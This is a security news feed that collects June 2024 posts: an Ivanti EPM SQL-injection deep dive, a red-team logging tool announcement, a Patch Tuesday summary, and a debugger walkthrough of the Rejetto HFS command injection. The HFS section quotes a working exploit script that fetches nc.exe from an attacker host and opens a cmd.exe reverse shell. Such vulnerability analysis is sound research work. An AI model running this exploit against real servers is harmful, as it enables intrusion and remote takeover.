Today — 12 June 2024Main stream

CVE-2024-29824 Deep Dive: Ivanti EPM SQL Injection Remote Code Execution Vulnerability

12 June 2024 at 14:27

Introduction

Ivanti Endpoint Manager (EPM) is an enterprise endpoint management solution that allows for centralized management of devices within an organization. On May 24, 2024, ZDI and Ivanti released an advisory describing a SQL injection resulting in remote code execution with a CVSS score of 9.8. In this post we will detail the internal workings of this vulnerability. Our POC can be found here.

RecordGoodApp

Luckily for us, the ZDI advisory told us exactly where to look for the SQL injection: a function named RecordGoodApp. After installation, we find most of the application binaries in C:\Program Files\LANDesk. Searching for RecordGoodApp, we find it's present in a file named PatchBiz.dll.

RecordGoodApp Search

We can use JetBrains' dotPeek tool to decompile the PatchBiz.dll C# binary. From there we can search for the RecordGoodApp method.

RecordGoodApp Disassembly

We can readily see that the first SQL statement in the function is potentially vulnerable to SQL injection. The code uses string.Format to insert the value of goodApp.md5 into the SQL query. Assuming we can find a way to influence the value of goodApp.md5, we should be able to trigger the SQL injection.
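
To make the string-formatting problem concrete, here is a minimal sketch in Python. It uses an in-memory SQLite database as a stand-in for the product's MS SQL backend, and the table name, column names and sample values are hypothetical, chosen only for illustration. It contrasts a query built by pasting a value into the SQL text (the same pattern as string.Format) with a parameterized query.

```python
import sqlite3


def build_query_unsafe(md5: str) -> str:
    # Same pattern as string.Format: the value becomes part of the SQL text.
    return "SELECT name FROM apps WHERE md5 = '{0}'".format(md5)


def lookup_safe(conn: sqlite3.Connection, md5: str):
    # Parameterized query: the driver passes md5 as data, never as SQL.
    return conn.execute("SELECT name FROM apps WHERE md5 = ?", (md5,)).fetchall()


# Hypothetical schema and rows, for illustration only.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE apps (name TEXT, md5 TEXT)")
conn.executemany("INSERT INTO apps VALUES (?, ?)",
                 [("a.exe", "aaa"), ("b.exe", "bbb")])

crafted = "x' OR '1'='1"  # a value that closes the quote and alters the WHERE clause
unsafe_rows = conn.execute(build_query_unsafe(crafted)).fetchall()
safe_rows = lookup_safe(conn, crafted)

print(len(unsafe_rows), len(safe_rows))
```

In the formatted version the crafted value rewrites the WHERE clause and every row comes back. In the parameterized version it is compared as a literal string and matches nothing.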

Finding a Path to the Vulnerable Function

Next, we would like to see if there are any obvious paths to the RecordGoodApp function that we can use to trigger the vulnerability. Luckily we can use dotPeek again to search for any references to RecordGoodApp. However, to make sure we don’t miss anything, we first want to make sure that we have all potential application binaries loaded into dotPeek. If we don’t, we run the risk of missing a reference to the vulnerable function. We find that RecordGoodApp is first called from AppMonitorAction.RecordPatchIssue.

AppMonitorAction.RecordPatchIssue

Continuing, we find that AppMonitorAction.RecordPatchIssue is called by Patch.UpdateActionHistory.

Patch.UpdateActionHistory

We find that UpdateActionHistory is called from three different locations.

Patch.UpdateActionHistory Usage

The most interesting of these usages is StatusEvents.EventHandler.UpdateStatusEvents. We find that it is annotated with [WebMethod] in the EventHandler class. EventHandler inherits from System.Web.Services.WebService. This strongly indicates that we should be able to hit UpdateStatusEvents over HTTP.

UpdateStatusEvents

Triggering the Vulnerable Function

Now that we have found a viable path to the vulnerable function, our attention turns to triggering the vulnerable function. First, using IIS Manager, we notice that EventHandler.cs is hosted on the /WSStatusEvents endpoint.

IIS Manager WSStatusEvents

Navigating to the endpoint in a browser, we are led to a page that shows some example requests and responses.

UpdateStatusEvents Examples

Now, we can copy these example requests into Burp Suite and begin modifying them to see if we can trigger the exploit. Using dnSpy, we attach to the IIS process hosting the vulnerable endpoint and start sending requests. After a little more reversing, we come up with a fairly trivial request using xp_cmdshell to gain RCE.

Successfully exploiting using Burp

Finally, we see notepad.exe running under sqlservr.exe, proving that our exploit worked!

notepad running under sqlservr.exe

Indicators of Compromise

The MS SQL logs can be examined for evidence of xp_cmdshell being utilized to obtain command execution. Note that this is likely not the only method for gaining RCE, but it is a popular one.

SQL Server logs showing evidence of xp_cmdshell usage.
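
As a rough triage aid for this indicator, the sketch below scans log text for mentions of xp_cmdshell. The function name and the sample lines are hypothetical and made up for illustration; real SQL Server log formats vary, and a hit is only a lead to investigate, not proof of compromise.

```python
import re

# Case-insensitive match, since log text may spell the procedure in any case.
XP_CMDSHELL = re.compile(r"xp_cmdshell", re.IGNORECASE)


def find_xp_cmdshell(lines):
    """Return (line_number, text) pairs for lines that mention xp_cmdshell."""
    return [
        (number, line.rstrip("\n"))
        for number, line in enumerate(lines, start=1)
        if XP_CMDSHELL.search(line)
    ]


# Made-up sample lines, not taken from a real server.
sample = [
    "2024-06-01 10:00:00 spid51 Starting up database 'demo'.",
    "2024-06-01 10:05:12 spid52 Configuration option 'xp_cmdshell' changed from 0 to 1.",
    "2024-06-01 10:06:00 spid52 Login succeeded for user 'demo'.",
]

hits = find_xp_cmdshell(sample)
for number, text in hits:
    print(number, text)
```

To scan a file, pass an open file object instead of the sample list, opened with whichever encoding matches your log files.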

NodeZero

NodeZero Attack Path utilizing CVE-2024-29824 to load a remote access tool and access files 

Horizon3.ai clients and free-trial users alike can run a NodeZero operation to determine the exposure and exploitability of this issue.

Sign up for a free trial and quickly verify you’re not exploitable.

The post CVE-2024-29824 Deep Dive: Ivanti EPM SQL Injection Remote Code Execution Vulnerability appeared first on Horizon3.ai.

Stepping Stones – A Red Team Activity Hub

12 June 2024 at 13:31

Executive Summary

NCC Group is pleased to open source a new tool built to help Red Teams log their activity for later correlation with the Blue Team’s own logging. What started as a simple internal web-based data-collection tool has grown to integrate with Cobalt Strike and BloodHound to improve the accuracy and ease of activity recording. As the tool became integral to how NCC Group’s Full Spectrum Attack Simulation (FSAS) team delivered Red and Purple Team assessments, additional functionality such as reporting plugins and credential analysis has grown the tool into something we believe could benefit the wider Red Teaming community.

Access the code at: https://github.com/nccgroup/SteppingStones

Features

Activity Recording

At the heart of Stepping Stones are “Events” which describe a specific Red Team action between a source and a target. They can be annotated with MITRE ATT&CK IDs, tags or the raw command line evidence. The original design philosophy, however, was to make data capture as effortless as possible, so none of these are mandatory; this allows data to be entered “in the heat of battle” rather than retrospectively.

Additionally, files can be dropped onto an Event to record where artifacts have been placed (allowing more effective post-job clean-up) and to generate file hashes for Blue Team reporting.
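
For readers who want to produce comparable hashes outside the tool, here is a minimal sketch using Python's standard hashlib. Which hash types Stepping Stones actually records is not stated here, so the choice of MD5, SHA-1 and SHA-256 is an assumption, and the function name is hypothetical.

```python
import hashlib
import os
import tempfile


def file_hashes(path, chunk_size=65536):
    """Compute several digests of a file in one pass, reading it in chunks."""
    # Assumed set of algorithms; adjust to whatever the Blue Team expects.
    digests = {name: hashlib.new(name) for name in ("md5", "sha1", "sha256")}
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            for digest in digests.values():
                digest.update(chunk)
    return {name: digest.hexdigest() for name, digest in digests.items()}


# Small demonstration on a throwaway file containing the bytes "abc".
with tempfile.NamedTemporaryFile(delete=False) as tmp:
    tmp.write(b"abc")
demo = file_hashes(tmp.name)
os.remove(tmp.name)

print(demo["sha256"])
```

Reading in chunks keeps memory use flat for large artifacts, and updating all digests in the same loop avoids reading the file more than once.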

Cobalt Strike Integration

Stepping Stones includes a bot which can connect to your Cobalt Strike team server and stream activity into Stepping Stones. This is held in a separate area of the application so that only the relevant activity can be “cherry-picked” and escalated into a reportable Event. This “cherry-picking” workflow also applies to other types of ingested activity like PowerShell transcripts imported via the bespoke EventStream format.

Alternatively, as beacons are spawned the source/target dropdowns for Events are updated with any new hosts, users and processes so that Events can also be manually recorded against the compromised systems.

Having access to real-time Cobalt Strike activity facilitates other functionality such as being able to notify (via webhooks) when a beacon first connects, or mark one as “watched” so that a Red Team operator can be re-notified should a dormant beacon reconnect, e.g. when a victim powers on their laptop the next day. Beacons and their associated activity can alternatively be excluded from the UI, reports and notifications if they match configurable patterns that identify them as the result of internal testing rather than genuine victim activity.

BloodHound Integration

To further improve the accuracy of sources and targets, Stepping Stones can connect to BloodHound’s Neo4j database and use the data within to suggest users and hosts.

Again, with this integration in place a number of other features were subsequently added to make the life of the Red Team operator easier: there is a tree view of the domain(s) OU structure in Stepping Stones based on the BloodHound data – allowing a more familiar hierarchical target selection view of the graph data. Similarly, Stepping Stones facilitates building wordlists from text in BloodHound to help crack those accounts whose password is derived from the account name or a comment on the user in AD.

Credentials

A successful Red Team operation will come across a number of passwords, secrets and hashes on their way to meeting their objectives. Managing these can be cumbersome and the Credentials area of Stepping Stones aims to alleviate that. Hashes and passwords can be extracted from raw tool output or the streamed Cobalt Strike activity, and any associated compromised accounts marked as “owned” within BloodHound automatically.

Features from https://github.com/crypt0rr/pack/ have been re-implemented to generate likely wordlists and hashcat masks from previously cracked data.
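
The idea of deriving masks from cracked passwords can be sketched as follows. This is not the Stepping Stones or PACK implementation; it is a simplified illustration that maps each character to one of hashcat's built-in charsets (?l, ?u, ?d, ?s) and ranks the resulting masks by frequency. The function names and sample passwords are hypothetical.

```python
import string
from collections import Counter


def password_to_mask(password):
    """Map each character to a hashcat built-in charset token.

    Returns None when a character falls outside ?l/?u/?d/?s, since such
    passwords do not translate cleanly into a per-character mask.
    """
    tokens = []
    for ch in password:
        if ch in string.ascii_lowercase:
            tokens.append("?l")
        elif ch in string.ascii_uppercase:
            tokens.append("?u")
        elif ch in string.digits:
            tokens.append("?d")
        elif ch in string.punctuation or ch == " ":
            tokens.append("?s")
        else:
            return None
    return "".join(tokens)


def rank_masks(passwords):
    """Return (mask, count) pairs, most common first."""
    masks = (password_to_mask(p) for p in passwords)
    return Counter(m for m in masks if m).most_common()


# Made-up sample data.
cracked = ["Summer2024!", "Winter2023!", "password1"]
ranking = rank_masks(cracked)
for mask, count in ranking:
    print(count, mask)
```

The most frequent masks can then be tried first in a mask attack against the remaining uncracked hashes.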

A graphical dashboard provides further insight into the patterns used for passwords, generating graphs for statistics like those produced by https://github.com/digininja/pipal and comparisons against the https://haveibeenpwned.com/ breached passwords.
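
How Stepping Stones performs the breached-password comparison is not described here. One common approach, shown below purely as an assumption, is the k-anonymity scheme of the Pwned Passwords range API: only the first five hex characters of the password's SHA-1 are sent to https://api.pwnedpasswords.com/range/, and the returned SUFFIX:COUNT lines are matched locally. The sketch covers the local part only, using a canned response body instead of a network call.

```python
import hashlib


def split_sha1(password):
    """Return (prefix, suffix): first 5 and remaining 35 hex chars of the SHA-1."""
    digest = hashlib.sha1(password.encode("utf-8")).hexdigest().upper()
    return digest[:5], digest[5:]


def count_in_range_response(suffix, body):
    """Look up a hash suffix in a range response made of SUFFIX:COUNT lines."""
    for line in body.splitlines():
        candidate, _, count = line.partition(":")
        if candidate.strip().upper() == suffix:
            return int(count)
    return 0


prefix, suffix = split_sha1("password")

# Canned body standing in for the HTTP response; the counts are made up.
canned_body = "{}:3\n{}:42\n".format("0" * 35, suffix)
hits = count_in_range_response(suffix, canned_body)

print(prefix, hits)
```

Only the five-character prefix would ever leave the machine, which matters when the passwords being checked belong to a client.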

Architecture

Stepping Stones has been “dogfooded” by the FSAS team throughout its multi-year development and has been able to happily scale up to multi-month jobs. However, the system aims to still be useful even if not integrated with Cobalt Strike/BloodHound.

It is a Python Django web application which can run on either Windows or Linux. The philosophy is to deploy a fresh instance for each engagement, as it supports multiple users, but not multiple engagements. The database is currently SQLite, allowing all data for that engagement to be archived without cross-contamination between jobs or a build-up of multiple jobs’ worth of sensitive data.

Full installation and upgrade steps can be found in the README file.

Horizon3.ai Appoints Jill Passalacqua as Chief Legal Officer

12 June 2024 at 13:05

Business Wire 06/12/2024

Horizon3.ai, a leading provider of autonomous security solutions, today announced the appointment of Jill Passalacqua as Chief Legal Officer (CLO), effective immediately. As Chief Legal Officer, Jill leads Horizon3.ai’s legal department, bringing extensive experience in advising prominent public and private technology companies…

Read the entire article here

The post Horizon3.ai Appoints Jill Passalacqua as Chief Legal Officer appeared first on Horizon3.ai.

[CVE-2014-6287] Rejetto HTTP File Server Remote Command Execution Vulnerability Analysis

12 June 2024 at 09:00

Author: k0shl. Please credit the source when reposting: https://whereisk0shl.top


Vulnerability Description


Software download:
https://sourceforge.net/projects/hfs/files/HFS/2.3b/ (thanks to @1195011908 for correcting the download address of the target software)

PoC:

#!/usr/bin/python
# Exploit Title: HttpFileServer 2.3.x Remote Command Execution
# Google Dork: intext:"httpfileserver 2.3"
# Date: 04-01-2016
# Remote: Yes
# Exploit Author: Avinash Kumar Thapa aka "-Acid"
# Vendor Homepage: http://rejetto.com/
# Software Link: http://sourceforge.net/projects/hfs/
# Version: 2.3.x
# Tested on: Windows Server 2008 , Windows 8, Windows 7
# CVE : CVE-2014-6287
# Description: You can use HFS (HTTP File Server) to send and receive files.
#          It's different from classic file sharing because it uses web technology to be more compatible with today's Internet.
#          It also differs from classic web servers because it's very easy to use and runs "right out-of-the box". Access your remote files, over the network. It has been successfully tested with Wine under Linux. 
  
#Usage : python Exploit.py <Target IP address> <Target Port Number>
 
#EDB Note: You need to be using a web server hosting netcat (http://<attackers_ip>:80/nc.exe).  
#          You may need to run it multiple times for success!
 
 
import urllib2
import sys
 
try:
    def script_create():
        urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+save+".}")
 
    def execute_script():
        urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+exe+".}")
 
    def nc_run():
        urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+exe1+".}")
 
    ip_addr = "192.168.44.128" #local IP address
    local_port = "443" # Local Port number
    vbs = "C:\Users\Public\script.vbs|dim%20xHttp%3A%20Set%20xHttp%20%3D%20createobject(%22Microsoft.XMLHTTP%22)%0D%0Adim%20bStrm%3A%20Set%20bStrm%20%3D%20createobject(%22Adodb.Stream%22)%0D%0AxHttp.Open%20%22GET%22%2C%20%22http%3A%2F%2F"+ip_addr+"%2Fnc.exe%22%2C%20False%0D%0AxHttp.Send%0D%0A%0D%0Awith%20bStrm%0D%0A%20%20%20%20.type%20%3D%201%20%27%2F%2Fbinary%0D%0A%20%20%20%20.open%0D%0A%20%20%20%20.write%20xHttp.responseBody%0D%0A%20%20%20%20.savetofile%20%22C%3A%5CUsers%5CPublic%5Cnc.exe%22%2C%202%20%27%2F%2Foverwrite%0D%0Aend%20with"
    save= "save|" + vbs
    vbs2 = "cscript.exe%20C%3A%5CUsers%5CPublic%5Cscript.vbs"
    exe= "exec|"+vbs2
    vbs3 = "C%3A%5CUsers%5CPublic%5Cnc.exe%20-e%20cmd.exe%20"+ip_addr+"%20"+local_port
    exe1= "exec|"+vbs3
    script_create()
    execute_script()
    nc_run()
except:
    print """[.]Something went wrong..!
    Usage is :[.] python exploit.py <Target IP address>  <Target Port Number>
    Don't forgot to change the Local IP address and Port number on the script"""

Run the script directly and enter the command you want to execute.


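This is a command injection vulnerability. hfs.exe does not enforce its filtering rules strictly, so the %00 truncation character can be used to bypass the check and have the command that follows it executed, resulting in arbitrary command execution. The vulnerability is analyzed in detail below.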


Vulnerability Analysis


Here we use ?search=%00{.exec|calc.} as the test input. First, hfs.exe receives the string from the search request at address 00403282.

0:000> g
Breakpoint 3 hit
eax=0012e5b0 ebx=0012f620 ecx=0000000d edx=010c78e8 esi=0012e5b0 edi=010c78e8
eip=00403282 esp=0012e598 ebp=00000016 iopl=0         nv up ei ng nz na po cy
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000283
hfs_exe_unpacked_+0x3282:
00403282 df3c11          fistp   qword ptr [ecx+edx] ds:0023:010c78f5=0000000000637c63
0:000> dc 010c78ef
010c78ef  652e7b00 7c636578 00000063 00000000  .{.exec|c.......
010c78ff  00000000 0c7ef900 431e6401 00000000  ......~..d.C....
010c790f  4355fc00 cebf0000 d066d800 cebf3800  ..UC......f..8..
010c791f  00000800 000060ff 00000000 0c7f4900  .....`.......I..
010c792f  00000001 00000000 53464800 4449535f  .........HFS_SID
010c793f  332e303d 37323730 31303031 30323631  =0.3072710011620
010c794f  00003730 0c815100 00000001 00001a00  07...Q..........
010c795f  72623c00 d6bbb23e bbd6b3a7 d3acbaf2  .<br>...........
0:000> dc edx
010c78e8  72616573 003d6863 78652e7b 637c6365  search=.{.exec|c

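The received string sits at 010c78e8. The outer function around this address inspects the incoming GET parameters and dispatches to different code paths accordingly; here it receives the contents of ?search.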

Next, the program reaches a regular-expression match, which filters the contents of the received parameter.

.text:00509828                 push    ebx
.text:00509829                 push    0
.text:0050982B                 mov     ecx, offset dword_50986C
.text:00509830                 mov     edx, offset a__ ; "\\{[.:]|[.:]\\}|\\|"
.text:00509835                 mov     eax, [ebp+var_4]
.text:00509838                 call    sub_50A848

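During this step the program walks through the value that follows search piece by piece, and this is the key to triggering the vulnerability. The instruction at 00509830 loads the regular-expression string into edx as the pattern for the match. Sequences that match are then encoded so that they cannot be executed as commands.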

For example, when we supply a normal search parameter:

0:000> g
Breakpoint 1 hit
eax=00d135c8 ebx=00579ecc ecx=0000002f edx=00000003 esi=00000003 edi=00000030
eip=00509147 esp=0012f04c ebp=0012f088 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
hfs_exe_unpacked_+0x109147:
00509147 e84c7d0000      call    hfs_exe_unpacked_+0x110e98 (00510e98)
0:000> dc eax
00d135c8  65722e7b 63616c70 7c227c65 6f757126  {.replace|"|&quo
00d135d8  207c3b74 32312326 652e3b33 26636578  t;| {.exec&
00d135e8  34323123 6c61633b 34232663 2e7d3b36  #124;calc.}.

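We can see that the relevant parts have been encoded. However, there is no special handling for %00: the routine simply treats the string as ending at %00, so this can be used to bypass the check.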
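
The effect of that truncation can be modelled with a short Python sketch. This is a simplified model, not a reimplementation of hfs.exe: the pattern is the one visible in the disassembly above, while the function names, the choice of HTML numeric entities for the encoding, and the way the tail is carried through are assumptions made for illustration.

```python
import re

# Pattern taken from the disassembly: "{." or "{:", ".}" or ":}", or "|".
MACRO_MARKERS = re.compile(r"\{[.:]|[.:]\}|\|")


def encode_match(match):
    # Assumed encoding: replace the braces and pipe with numeric entities.
    return "".join("&#%d;" % ord(c) if c in "{}|" else c for c in match.group(0))


def sanitize_full(text):
    """Encode macro markers across the whole string."""
    return MACRO_MARKERS.sub(encode_match, text)


def sanitize_c_string(text):
    """Model of a routine that treats NUL as end-of-string.

    Only the part before the first NUL is scanned; everything after it
    is carried through untouched.
    """
    head, nul, tail = text.partition("\x00")
    return MACRO_MARKERS.sub(encode_match, head) + nul + tail


macro = "{.exec|calc.}"
print(sanitize_full(macro))                        # markers are encoded
print(repr(sanitize_c_string("\x00" + macro)))     # markers survive after the NUL
```

With the NUL byte in front, the scanned portion is empty, so the macro markers reach the later parsing stage unmodified. This matches what the debugger output below shows.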

0:000> bp 00509147 ".if(@eax == 0x00d22728){;}.else{g;}"

0:000> g
(344.348): Unknown exception - code 0eedfade (first chance)
(344.348): Unknown exception - code 0eedfade (first chance)
eax=00d22728 ebx=00579ecc ecx=0000000c edx=00000004 esi=00000003 edi=0000000d
eip=00509147 esp=0012f04c ebp=0012f088 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
hfs_exe_unpacked_+0x109147:
00509147 e84c7d0000      call    hfs_exe_unpacked_+0x110e98 (00510e98)
0:000> dc eax
00d22728  652e7b00 7c636578 636c6163 00007d2e  .{.exec|calc.}..

Here the processed string has not been encoded and is passed through as-is, which is what causes the vulnerability. Next:

int __stdcall sub_5096E0(signed int a1, int a2)
{
  int result; // eax@2
  int savedregs; // [sp+Ch] [bp+0h]@2

  if ( a1 <= 50 )
  {
    sub_508ECC(&savedregs);
    result = sub_509418((int)&savedregs);
  }
  return result;
}

The program then enters sub_5096E0 to process the string. This processing separates exec from calc so that exec can be matched later and calc executed. First:

0:000> p
eax=00d22728 ebx=0000000b ecx=00000009 edx=00000003 esi=0000000c edi=0000000d
eip=00405987 esp=0012f020 ebp=0012f044 iopl=0         nv up ei ng nz ac po cy
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000293
hfs_exe_unpacked_+0x5987:
00405987 7f11            jg      hfs_exe_unpacked_+0x599a (0040599a)     [br=0]
0:000> p
eax=00d22728 ebx=0000000b ecx=00000009 edx=00000003 esi=0000000c edi=0000000d
eip=00405989 esp=0012f020 ebp=0012f044 iopl=0         nv up ei ng nz ac po cy
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000293
hfs_exe_unpacked_+0x5989:
00405989 01c2            add     edx,eax
0:000> p
eax=00d22728 ebx=0000000b ecx=00000009 edx=00d2272b esi=0000000c edi=0000000d
eip=0040598b esp=0012f020 ebp=0012f044 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
hfs_exe_unpacked_+0x598b:
0040598b 8b442408        mov     eax,dword ptr [esp+8] ss:0023:0012f028=0012f080
0:000> dc edx
00d2272b  63657865 6c61637c 007d2e63 007c5c00  exec|calc.}..\|.
00d2273b  d2310100 00000000 00000c00 53464800  ..1..........HFS
00d2274b  cfc5d03d d0d0d6a2 d00000c4 0000edb1  =...............
00d2275b  d1c00000 00000100 00001000 74706f00  .............opt
00d2276b  2e6e6f69 6d6d6f63 3d746e65 31000031  ion.comment=1..1
00d2277b  d1c00000 00000100 00000e00 4c505500  .............UPL
00d2278b  2044414f 55534552 0053544c 00000000  OAD RESULTS.....
00d2279b  d1c00000 00000100 00000e00 524c4100  .............ALR

Here the {. portion of the string is handled, yielding a new string. We continue tracing.

0:000> g
Breakpoint 8 hit
eax=010c3150 ebx=0012ed54 ecx=636c6163 edx=010c2af0 esi=010c3150 edi=010c2af0
eip=00403324 esp=0012ed00 ebp=0012ed34 iopl=0         nv up ei ng nz ac pe cy
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000297
hfs_exe_unpacked_+0x3324:
00403324 c3              ret
0:000> dc eax
010c3150  636c6163 6c610000 00650063 010c2960  calc..alc.e.`)..
010c3160  00000001 0000000b 72616553 cb3d6863  ........Search=.
010c3170  00f7cbd1 010c2960 00000001 0000000b  ....`)..........
010c3180  646c6f46 c43d7265 00bcc2bf 010c2960  Folder=.....`)..
010c3190  00000001 00000009 6b636142 bbb5b73d  ........Back=...
010c31a0  312d00d8 010c2960 00000001 0000000b  ..-1`)..........
010c31b0  b73d7055 c9d8bbb5 00e3b2cf 010c2960  Up=.........`)..
010c31c0  00000001 00000009 656d6f48 d2d7ca3d  ........Home=...
0:000> dc 010c2b68
010c2b68  63657865 78650000 00006365 010c2960  exec..exec..`)..
010c2b78  00cc49a0 00000007 70747468 002f2f3a  .I......http://.
010c2b88  00650031 010c2960 00000001 00000009  1.e.`)..........
010c2b98  454d4954 46454c20 00000054 010c2a71  TIME LEFT...q*..
010c2ba8  00000000 00000007 45464552 00524552  ........REFERER.
010c2bb8  00454d49 010c2960 00000001 00000008  IME.`)..........

By setting a memory-write breakpoint, we can see that exec and calc are separated after processing. Next the program enters sub_52CE88, which copies the calc string.

int __usercall sub_52CE88@<eax>(int a1@<eax>, int a2@<edx>, int a3@<ebx>)
{
  int v3; // esi@1
  int v4; // ecx@1
  int v5; // ecx@1
  int v6; // ecx@1
  int v7; // ebx@3
  int *v8; // ecx@5
  unsigned int v10; // [sp-Ch] [bp-1Ch]@1
  void *v11; // [sp-8h] [bp-18h]@1
  int *v12; // [sp-4h] [bp-14h]@1
  int v13; // [sp+8h] [bp-8h]@1
  int v14; // [sp+Ch] [bp-4h]@1
  int savedregs; // [sp+10h] [bp+0h]@1

  v13 = 0;
  v3 = a2;
  v14 = a1;
  __linkproc__ LStrAddRef();
  v12 = &savedregs;
  v11 = &loc_52CF19;
  v10 = __readfsdword(0);
  __writefsdword(0, (unsigned int)&v10);
  __linkproc__ LStrAsg(v4, v14);

After this step completes, we continue single-stepping.

.text:00537063 loc_537063:                             ; CODE XREF: sub_535540+1B16j
.text:00537063                 mov     eax, [ebp+var_4]
.text:00537066                 mov     edx, offset aExec ; "exec"
.text:0053706B                 call    @@LStrCmp       ; __linkproc__ LStrCmp
.text:00537070                 jnz     short loc_537079
.text:00537072                 push    ebp
.text:00537073                 call    sub_5328E8

Here the program compares the string against exec. If it matches, the call to sub_5328E8 that follows is executed.

Breakpoint 3 hit
eax=010c3f78 ebx=00d07ad0 ecx=63657865 edx=00538970 esi=00000003 edi=00000006
eip=0053706b esp=0012edb4 ebp=0012f044 iopl=0         nv up ei ng nz ac po cy
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000293
hfs_exe_unpacked_+0x13706b:
0053706b e8e8e7ecff      call    hfs_exe_unpacked_+0x5858 (00405858)
0:000> dc eax
010c3f78  63657865 253d0000 00263030 010c2960  exec..=%00&.`)..
010c3f88  00000002 00000009 63657865 6c61637c  ........exec|cal
010c3f98  00260063 010c2960 00000001 00000007  c.&.`)..........
010c3fa8  6165733f 00686372 00000000 0d3d7364  ?search.....ds=.
010c3fb8  616e650a 2d656c62 7263616d 793d736f  .enable-macros=y
010c3fc8  0a0d7365 2d657375 74737973 692d6d65  es..use-system-i
010c3fd8  736e6f63 7365793d 696d0a0d 696d696e  cons=yes..minimi
010c3fe8  742d657a 72742d6f 793d7961 0a0d7365  ze-to-tray=yes..
0:000> dc edx
00538970  63657865 00000000 ffffffff 00000014  exec............
00538980  a8b6e8c9 d8b55049 c4b5b7d6 c8b6d9cb  ....IP..........
00538990  c6d6decf 00000000 00000000 447a0000  ..............zD

Both string pointers being compared, eax and edx, point to exec, so the comparison succeeds and execution proceeds into sub_5328E8.

.text:00532AD9 loc_532AD9:                             ; CODE XREF: sub_5328E8+D7j
.text:00532AD9                 mov     eax, [ebp+arg_0]
.text:00532ADC                 push    eax
.text:00532ADD                 lea     edx, [ebp+var_2C]
.text:00532AE0                 mov     eax, [ebp+arg_0]
.text:00532AE3                 mov     eax, [eax-10h]
.text:00532AE6                 call    sub_52CE88
.text:00532AEB                 mov     eax, [ebp+var_2C]
.text:00532AEE                 mov     ecx, 5
.text:00532AF3                 mov     edx, [ebp+var_4]
.text:00532AF6                 call    sub_50CEC4

Execution reaches address 00532AF6, which calls sub_50CEC4. This is the function that performs the execution; here is its pseudocode.

char *__usercall sub_50CEC4@<eax>(_BYTE *a1@<eax>, int a2@<edx>, signed __int32 a3@<ecx>)
{
  nShowCmd = _InterlockedExchange((volatile signed __int32 *)&v46, a3);

      if ( v46
        && (v20 = nShowCmd,
            v21 = (const CHAR *)__linkproc__ LStrToPChar(),
            v22 = (const CHAR *)__linkproc__ LStrToPChar(),
            (unsigned int)ShellExecuteA(0, "open", v22, v21, 0, v20) > 0x20) )
      {

The pseudocode calls ShellExecuteA, which executes the arbitrary command.

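To summarize: while processing the received search parameter, the program runs a regular-expression match and encodes whatever matches. That step does not handle %00 and mistakenly treats the string as ending there, which lets an attacker bypass the regex filter. During the later parsing stage, exec is then matched as a command and an arbitrary command is executed.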

Yesterday — 11 June 2024Main stream

Only one critical issue disclosed as part of Microsoft Patch Tuesday

11 June 2024 at 17:46

Microsoft released its monthly security update Tuesday, disclosing 49 vulnerabilities across its suite of products and software.  

Of those, there is only one critical vulnerability. Every other security issue disclosed this month is considered "important."

The lone critical security issue is CVE-2024-30080, a remote code execution vulnerability due to a use-after-free (UAF) issue in the HTTP handling function of Microsoft Message Queuing (MSMQ) messages.  

An adversary can send a specially crafted malicious MSMQ packet to an MSMQ server, potentially allowing them to perform remote code execution on the server side. Microsoft considers this vulnerability “more likely” to be exploited. 

There is also a remote code execution vulnerability in Microsoft Outlook, CVE-2024-30103. By successfully exploiting this vulnerability, an adversary can bypass Outlook registry block lists and enable the creation of malicious DLL (Dynamic Link Library) files. However, the adversary must be authenticated using valid Microsoft Exchange user credentials. Microsoft has also mentioned that the Outlook application Preview Pane is an attack vector. 

The company also disclosed a high-severity elevation of privilege vulnerability in Azure Monitor Agent (CVE-2024-35254). An unauthenticated adversary with read access permissions can exploit this vulnerability by performing arbitrary file and folder deletion on a host where the Azure Monitor Agent is installed. This vulnerability does not disclose confidential information, but it could allow the adversary to delete data, which could result in a denial of service. 

CVE-2024-30077, a high-severity remote code execution vulnerability in Microsoft OLE (Object Linking and Embedding), could also be triggered if an adversary tricks an authenticated user into attempting to connect to a malicious SQL server database via a connection driver (OLE DB or OLEDB). This could result in the database returning malicious data that could cause arbitrary code execution on the client.  

The Windows Wi-Fi driver also contains a high-severity remote code execution vulnerability, CVE-2024-30078. An adversary can exploit this vulnerability by sending a malicious networking packet to an adjacent system employing a Wi-Fi networking adapter, which could enable remote code execution. However, to exploit this vulnerability, an adversary must be near the target system to send and receive radio transmissions.  

CVE-2024-30063 and CVE-2024-30064 are high-severity elevation of privilege vulnerabilities in the Windows Distributed File System (DFS). An adversary who successfully exploits these vulnerabilities could gain elevated privileges through a vulnerable DFS client, allowing the adversary to locally execute arbitrary code in the kernel. However, an adversary must be locally authenticated to exploit these vulnerabilities by running a specially crafted application.  

Talos would also like to highlight a few more high-severity elevation of privilege vulnerabilities that Microsoft considers “more likely” to be exploited. 

CVE-2024-30068, an elevation of privilege vulnerability in the Windows kernel, could allow an adversary to gain SYSTEM-level privileges. By exploiting this vulnerability from a low-privilege AppContainer, an adversary can elevate their privileges and execute code or access resources at a higher integrity level than that of the AppContainer execution environment. However, the adversary must first log in to the system and then run a specially crafted application that exploits the vulnerability to take control of an affected system.  

There are three high-severity elevation of privilege vulnerabilities (CVE-2024-30082, CVE-2024-30087 and CVE-2024-30091) in Win32K kernel drivers that exist because of an out-of-bounds (OOB) issue. An adversary who exploits CVE-2024-30082 could gain SYSTEM privileges, while exploiting CVE-2024-30087 or CVE-2024-30091 would grant the rights of the user running the affected application. Microsoft considers these vulnerabilities “more likely” to be exploited. 

